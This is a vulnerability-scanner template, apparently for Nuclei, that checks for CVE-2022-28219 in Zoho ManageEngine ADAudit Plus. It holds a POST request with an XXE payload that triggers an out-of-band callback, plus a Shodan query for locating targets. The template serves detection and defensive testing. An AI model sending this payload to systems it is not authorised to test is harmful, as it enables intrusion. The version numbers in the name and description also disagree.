-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-28219.yaml
58 lines (52 loc) · 1.75 KB
/
CVE-2022-28219.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
id: CVE-2022-28219
info:
name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
author: dwisiswant0
severity: critical
description: |
Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
unauthenticated XML entity injection attack that can lead to remote code execution.
reference:
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://manageengine.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-28219
remediation: |
Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
is configured with a dedicated service account with restricted privileges.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28219
cwe-id: CWE-611
metadata:
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
verified: "true"
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/api/agent/tabs/agentData"
headers:
Content-Type: application/json
body: |
[
{
"DomainName": "{{Host}}",
"EventCode": 4688,
"EventType": 0,
"TimeGenerated": 0,
"Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
}
]
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "ManageEngine"
# Enhanced by mp on 2022/07/04